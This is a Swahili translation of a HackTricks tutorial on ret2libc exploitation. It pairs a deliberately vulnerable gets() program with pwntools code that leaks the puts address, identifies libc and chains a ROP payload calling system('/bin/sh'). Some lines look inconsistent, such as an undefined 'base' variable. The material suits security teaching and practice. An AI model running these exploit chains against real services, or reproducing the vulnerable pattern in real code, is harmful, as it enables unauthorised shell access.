Kuonyesha anwani ya libc kwa kutumia ROP

Reading time: 10 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Muhtasari wa Haraka

  1. Pata overflow offset
  2. Pata gadget ya POP_RDI, PUTS_PLT na gadget za MAIN
  3. Tumia gadget za awali ku onyesha anwani ya kumbukumbu ya puts au kazi nyingine ya libc na pata toleo la libc (donwload it)
  4. Pamoja na maktaba, hesabu ROP na uitumie

Miongozo mingine na binaries za kufanya mazoezi

Miongozo hii itatumia msimbo/binary uliopendekezwa katika miongozo hii: https://tasteofsecurity.com/security/ret2libc-unknown-libc/
Miongozo mingine ya manufaa: https://made0x78.com/bseries-ret2libc/, https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html

Msimbo

Filename: vuln.c

c
#include <stdio.h>

int main() {
char buffer[32];
puts("Simple ROP.\n");
gets(buffer);

return 0;
}
bash
gcc -o vuln vuln.c -fno-stack-protector -no-pie

ROP - Kuonyesha LIBC template

Pakua exploit na uweke katika saraka moja na binary iliyo hatarini na upe data zinazohitajika kwa script:

Leaking libc - template

1- Kutafuta offset

Template inahitaji offset kabla ya kuendelea na exploit. Ikiwa yoyote itatolewa itatekeleza msimbo unaohitajika kuipata (kwa default OFFSET = ""):

bash
###################
### Find offset ###
###################
OFFSET = ""#"A"*72
if OFFSET == "":
gdb.attach(p.pid, "c") #Attach and continue
payload = cyclic(1000)
print(r.clean())
r.sendline(payload)
#x/wx $rsp -- Search for bytes that crashed the application
#cyclic_find(0x6161616b) # Find the offset of those bytes
return

Tekeleza python template.py konso ya GDB itafunguliwa na programu itakuwa inakabiliwa na ajali. Ndani ya konso ya GDB tekeleza x/wx $rsp ili kupata bytes ambazo zilikuwa zinaenda kufunika RIP. Hatimaye pata offset ukitumia konso ya python:

python
from pwn import *
cyclic_find(0x6161616b)

Baada ya kupata offset (katika kesi hii 40) badilisha variable ya OFFSET ndani ya template ukitumia thamani hiyo.
OFFSET = "A" * 40

Njia nyingine ingekuwa kutumia: pattern create 1000 -- tekeleza hadi ret -- pattern seach $rsp kutoka GEF.

2- Kupata Gadgets

Sasa tunahitaji kupata ROP gadgets ndani ya binary. Hizi ROP gadgets zitakuwa na manufaa kuita puts ili kupata libc inayotumika, na baadaye kuanzisha exploit ya mwisho.

python
PUTS_PLT = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] # This is also valid to call puts
MAIN_PLT = elf.symbols['main']
POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi"
RET = (rop.find_gadget(['ret']))[0]

log.info("Main start: " + hex(MAIN_PLT))
log.info("Puts plt: " + hex(PUTS_PLT))
log.info("pop rdi; ret  gadget: " + hex(POP_RDI))

The PUTS_PLT inahitajika kuita function puts.
The MAIN_PLT inahitajika kuita main function tena baada ya mwingiliano mmoja ili exploit overflow tena (mizunguko isiyo na mwisho ya exploitation). Inatumika mwishoni mwa kila ROP kuita programu tena.
The POP_RDI inahitajika kupitisha parameter kwa function iliyoitwa.

Katika hatua hii huwezi kutekeleza chochote kwani kila kitu kitapatikana na pwntools wakati wa utekelezaji.

3- Kupata maktaba ya libc

Sasa ni wakati wa kupata ni toleo gani la libc maktaba linatumika. Ili kufanya hivyo tutakuwa na leak anwani katika kumbukumbu ya function puts na kisha tutatafuta ni library version gani toleo la puts liko katika anwani hiyo.

python
def get_addr(func_name):
FUNC_GOT = elf.got[func_name]
log.info(func_name + " GOT @ " + hex(FUNC_GOT))
# Create rop chain
rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)

#Send our rop-chain payload
#p.sendlineafter("dah?", rop1) #Interesting to send in a specific moment
print(p.clean()) # clean socket buffer (read all and print)
p.sendline(rop1)

#Parse leaked address
recieved = p.recvline().strip()
leak = u64(recieved.ljust(8, "\x00"))
log.info("Leaked libc address,  "+func_name+": "+ hex(leak))
#If not libc yet, stop here
if libc != "":
libc.address = leak - libc.symbols[func_name] #Save libc base
log.info("libc base @ %s" % hex(libc.address))

return hex(leak)

get_addr("puts") #Search for puts address in memmory to obtains libc base
if libc == "":
print("Find the libc library and continue with the exploit... (https://libc.blukat.me/)")
p.interactive()

Ili kufanya hivyo, mstari muhimu zaidi wa msimbo uliofanywa ni:

python
rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)

Hii itatuma baadhi ya bytes hadi kuandika RIP iwezekanavyo: OFFSET.
Kisha, itapanga anwani ya gadget POP_RDI ili anwani inayofuata (FUNC_GOT) ihifadhiwe katika rejista ya RDI. Hii ni kwa sababu tunataka kuita puts tukipitia anwani ya PUTS_GOT kwani anwani katika kumbukumbu ya kazi ya puts imehifadhiwa katika anwani inayotolewa na PUTS_GOT.
Baada ya hapo, PUTS_PLT itaitwa (ikiwa na PUTS_GOT ndani ya RDI) ili puts isome maudhui ndani ya PUTS_GOT (anwani ya kazi ya puts katika kumbukumbu) na it ichapishe.
Hatimaye, kazi ya main inaitwa tena ili tuweze kutumia overflow tena.

Kwa njia hii tumem danganya kazi ya puts ili ichapishe anwani katika kumbukumbu ya kazi puts (ambayo iko ndani ya maktaba ya libc). Sasa kwamba tuna anwani hiyo tunaweza kutafuta ni toleo gani la libc linatumika.

Kwa kuwa tun atumia baadhi ya binary za local si lazima kujua ni toleo gani la libc linatumika (pata tu maktaba katika /lib/x86_64-linux-gnu/libc.so.6).
Lakini, katika kesi ya exploit ya mbali nitafafanua hapa jinsi unavyoweza kulipata:

3.1- Kutafuta toleo la libc (1)

Unaweza kutafuta ni maktaba gani inatumika kwenye ukurasa wa wavuti: https://libc.blukat.me/
Itakuruhusu pia kupakua toleo lililogunduliwa la libc

3.2- Kutafuta toleo la libc (2)

Unaweza pia kufanya:

  • $ git clone https://github.com/niklasb/libc-database.git
  • $ cd libc-database
  • $ ./get

Hii itachukua muda, kuwa na subira.
Ili hii ifanye kazi tunahitaji:

  • Jina la alama ya Libc: puts
  • Anwani ya libc iliyovuja: 0x7ff629878690

Tunaweza kubaini ni libc ipi ambayo inawezekana inatumika.

bash
./find puts 0x7ff629878690
ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64)
archive-glibc (id libc6_2.23-0ubuntu11_amd64)

Tunapata mechi 2 (unapaswa kujaribu ya pili ikiwa ya kwanza haifanyi kazi). Pakua ya kwanza:

bash
./download libc6_2.23-0ubuntu10_amd64
Getting libc6_2.23-0ubuntu10_amd64
-> Location: http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.23-0ubuntu10_amd64.deb
-> Downloading package
-> Extracting package
-> Package saved to libs/libc6_2.23-0ubuntu10_amd64

Nakili libc kutoka libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so hadi kwenye directory yetu ya kazi.

3.3- Kazi nyingine za kuvuja

python
puts
printf
__libc_start_main
read
gets

4- Kupata anwani ya libc kulingana na msingi & kutumia

Katika hatua hii tunapaswa kujua maktaba ya libc inayotumika. Kwa kuwa tunatumia binary ya ndani nitatumia tu: /lib/x86_64-linux-gnu/libc.so.6

Hivyo, mwanzoni mwa template.py badilisha libc variable kuwa: libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it

Kutoa path kwa maktaba ya libc sehemu nyingine ya exploit itakuwa inakokotwa kiotomatiki.

Ndani ya get_addrfunction anwani ya msingi ya libc itakokotwa:

python
if libc != "":
libc.address = leak - libc.symbols[func_name] #Save libc base
log.info("libc base @ %s" % hex(libc.address))

note

Kumbuka kwamba anwani ya mwisho ya msingi ya libc lazima iishe na 00. Ikiwa hiyo si hali yako unaweza kuwa umepata maktaba isiyo sahihi.

Kisha, anwani ya kazi system na anwani ya mfuatano "/bin/sh" zitakuwa zinahesabiwa kutoka kwa anwani ya msingi ya libc na kutolewa kwa maktaba ya libc.

python
BINSH = next(libc.search("/bin/sh")) - 64 #Verify with find /bin/sh
SYSTEM = libc.sym["system"]
EXIT = libc.sym["exit"]

log.info("bin/sh %s " % hex(BINSH))
log.info("system %s " % hex(SYSTEM))

Hatimaye, exploit ya utekelezaji wa /bin/sh itakuwa tayari kutumwa:

python
rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT)

p.clean()
p.sendline(rop2)

#### Interact with the shell #####
p.interactive() #Interact with the conenction

Hebu tueleze hii ROP ya mwisho.
ROP ya mwisho (rop1) ilimaliza kwa kuita tena kazi kuu, kisha tunaweza ku exploit tena overflow (ndiyo maana OFFSET iko hapa tena). Kisha, tunataka kuita POP_RDI ikielekeza kwenye anwani ya "/bin/sh" (BINSH) na kuita kazi ya system (SYSTEM) kwa sababu anwani ya "/bin/sh" itapewa kama parameter.
Hatimaye, anwani ya kazi ya exit inaitwa ili mchakato uondoke vizuri na tahadhari yoyote itazalishwa.

Hivi ndivyo exploit itatekeleza /bin/sh shell.

4(2)- Kutumia ONE_GADGET

Unaweza pia kutumia ONE_GADGET kupata shell badala ya kutumia system na "/bin/sh". ONE_GADGET itapata ndani ya maktaba ya libc njia fulani ya kupata shell kwa kutumia tu anwani moja ya ROP.
Hata hivyo, kawaida kuna vikwazo fulani, ambavyo ni vya kawaida na rahisi kuepukwa ni kama [rsp+0x30] == NULL Kwa kuwa unadhibiti thamani ndani ya RSP unahitaji tu kutuma thamani zaidi za NULL ili kuepuka kikwazo.

python
ONE_GADGET = libc.address + 0x4526a
rop2 = base + p64(ONE_GADGET) + "\x00"*100

FAILI LA KUTUMIA

Unaweza kupata kigezo cha kutumia udhaifu huu hapa:

Leaking libc - template

Matatizo ya kawaida

MAIN_PLT = elf.symbols['main'] haipatikani

Ikiwa alama ya "main" haipo. Basi unaweza kupata wapi kuna msimbo mkuu:

python
objdump -d vuln_binary | grep "\.text"
Disassembly of section .text:
0000000000401080 <.text>:

na kuweka anwani kwa mikono:

python
MAIN_PLT = 0x401080

Puts hazipatikani

Ikiwa binary haitumii Puts unapaswa kuangalia ikiwa inatumia

sh: 1: %s%s%s%s%s%s%s%s: hazipatikani

Ikiwa unapata kosa hili baada ya kuunda yote ya exploit: sh: 1: %s%s%s%s%s%s%s%s: hazipatikani

Jaribu kupunguza byte 64 kutoka anwani ya "/bin/sh":

python
BINSH = next(libc.search("/bin/sh")) - 64

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks